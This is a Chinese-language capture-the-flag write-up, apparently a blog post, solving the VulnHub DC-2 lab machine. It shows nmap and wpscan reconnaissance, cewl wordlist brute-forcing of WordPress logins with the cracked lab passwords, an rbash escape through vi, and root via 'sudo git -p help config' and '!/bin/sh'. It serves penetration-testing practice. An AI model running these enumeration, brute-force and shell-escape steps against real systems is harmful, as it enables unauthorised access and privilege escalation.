首页 > 其他分享 >vulnhub DC-2靶场

vulnhub DC-2靶场

时间:2023-12-17 21:59:36浏览次数:24  
标签:bin DC 192.168 dc 命令 42.155 PATH 靶场 vulnhub

1.信息收集

扫描存活主机

sudo arp-scan -l

1

扫描主机开放端口

nmap -p- 192.168.42.155

2

扫描主机开放端口的具体服务

nmap -p 80,7744 -sV -A 192.168.42.155

3

80端口是网页,7744是SSH

日常扫描指纹

whatweb 192.168.42.155

4

2.漏洞挖掘

访问网站,发现无法访问,猜测为hosts问题

5

改写host文件

vim /etc/hosts

192.168.42.155 dc-2

8

成功访问,开始逛街

6

点击flag,得到FLAG1

7

没东西了,开始扫扫路径

dirb http://dc-2/

8 (2)

发现一个登录框,是wordpass建站模板

先一个默认密码,没成功,再想想办法

9

找到一个专门找wp账号的工具

wpscan --url dc-2 -e u

10

找到三个用户,admin,jerry,tom

11

既然有账号,就有想办法得到密码,上cewl工具,

cwel http://dc-2 -w dict.txt

12

有了账号密码,开始爆破

13

爆破成功

tom

parturient

jerry

adipiscing

14

3.漏洞利用

登录两个账号看看

15

在jerry账号中page找到FLAG2

20

根据FLAG2的内容,我们尝试ssh登录

ssh服务在7744

ssh [email protected] -p 7744

21

cat 发现报错(-rbash

rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。

于是查找可用命令

echo $PATH

echo /home/tom/usr/bin/*

只有less,ls,scp,vi

111

命令太少,尝试rbash逃逸

export

显示环境变量

22

输入以下命令

vi shell

:set shell=/bin/sh
:shell

$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin/

222

逃逸成功,查看flag3.txt

16

理解内容,他让su用户

17.

4.提升权限

找一下新的FLAG4

find / -name *flag*

25

还有FLAG,开始提权

26

常规命令

find / -perm -u=s -type f 2>/dev/null

23

发现没什么特殊的,换命令

发现git命令

sudo -l

24

不会用,有网站

查一下git

27

找一条你喜欢的命令

sudo git -p help config

!/bin/sh

28

提权成功,拿到全部FLAG

cat /root/final-flag.txt

29

标签:bin,DC,192.168,dc,命令,42.155,PATH,靶场,vulnhub
From: https://www.cnblogs.com/xiheaaa/p/17909910.html

相关文章

  • 阿里云AnalyticDB基于Flink CDC+Hudi实现多表全增量入湖实践
    湖仓一体(LakeHouse)是大数据领域的重要发展方向,提供了流批一体和湖仓结合的新场景。阿里云AnalyticDB for MySQL基于 Apache Hudi 构建了新一代的湖仓平台,提供日志、CDC等多种数据源一键入湖,在离线计算引擎融合分析等能力。本文将主要介绍AnalyticDB for MySQL基于Apache ......
  • DC-设计和工艺数据-02
    在compile之前保存ddc设计文件checkdesign-检查文件的连接性和物理性checkdesign之后可以将未映射的网表写出,如果是几十万级的RTL,如果不写出,设置约束出现问题,更改之后,前面的流程需要重新进行,花费时间checkdesign之后写出未映射的网表,再读入约束,方便进行调整约......
  • P-MOSFET AP3P010YT、LTW-S270DC5-PE SMD LED灯具、MAAT-010521-L1TR05 蜂窝 衰减器
    1、AP3P010YT 高级功率MOSFET为设计人员提供了快速开关、加固型器件设计、低导通电阻和高性价比的最佳组合。PMPAK®3x3封装专为DC-DC转换器应用而设计,外形较小,为1.0mm,带背面散热器。电压:-30V电流:-14.6A电阻:10mΩ特性•低栅极电荷BVDSS•快速切换特性RDS(ON)•简单驱动器要求ID•......
  • vulnhub-wp Bsidesvancouver
    ......
  • 外观很好看的云盘:一款开源的云盘系统 —— kodcloud
    看到一款外观十分好看的开源云盘系统:下载地址:https://kodcloud.com/explorer/download/    开源地址:https://github.com/kalcaddle  具体项目:https://github.com/kalcaddle/KodExplorer  ==========================  这个网盘系统是使用PHP语言写......
  • 世微 AP9166 DC-DC同步降压恒压芯片 18V 2A同步降压转换器
     600KHz,18V,2A同步降压转换器概述AP9166是一款完全集成的效率2A同步整流降压转换器。AP9166运行在宽输出电流上以高效率负载范围。此设备提供两个操作模式、PWM控制和PFM模式切换控制,允许更宽范围的高效率负载AP9166至少需要现成标准的数量外部组件,在中可用符合SOT23-6标准的6针......
  • BOSHIDA DC电源模块的设计与制造技术创新
    BOSHIDADC电源模块的设计与制造技术创新DC电源模块的设计与制造技术创新主要涉及以下几个方面: 1.高效率设计:传统的DC电源模块存在能量转换损耗较大的问题,技术创新可通过采用高效率的电路拓扑结构、使用高性能的功率开关器件和优化控制算法等手段来提高能量转换效率,降低能量......
  • 5G RedCap
    ЗначениеRedCap5GRedCapотноситсякстандарту5G,предложенному3GPP.Посравнениюсранеевыпущеннымстандартом5G,функцииболееоптимизированы.5GRedCap......
  • FirebirdSql.Data.FirebirdClient.FbDataAdapter的bug吗
    在连接Firebird4数据库时,使用以下: FbDataAdapterda=newFbDataAdapter(sql,this.cnstring); DataTabledt=newDataTable(); da.Fill(dt); returndt;在一直的相像中,FbDataAdapter在接收到连接字符串时,会自动创建一个Connection并Open使用,用完再Close,即不需......
  • vulnhub-DC-2
    DC-2kali192.168.43.149DC-2192.168.43.18nmsp-sT--min-rate10000-p-192.168.43.18nmap-T4-A-v-Pn192.168.43.18发现开放端口:80、7744访问80端口,发现是个wordpress站点FLAG1提示使用cewl获取爆破字典cewlhttp://dc-2-wdc2Pass.txt——将爬取的单词写入文......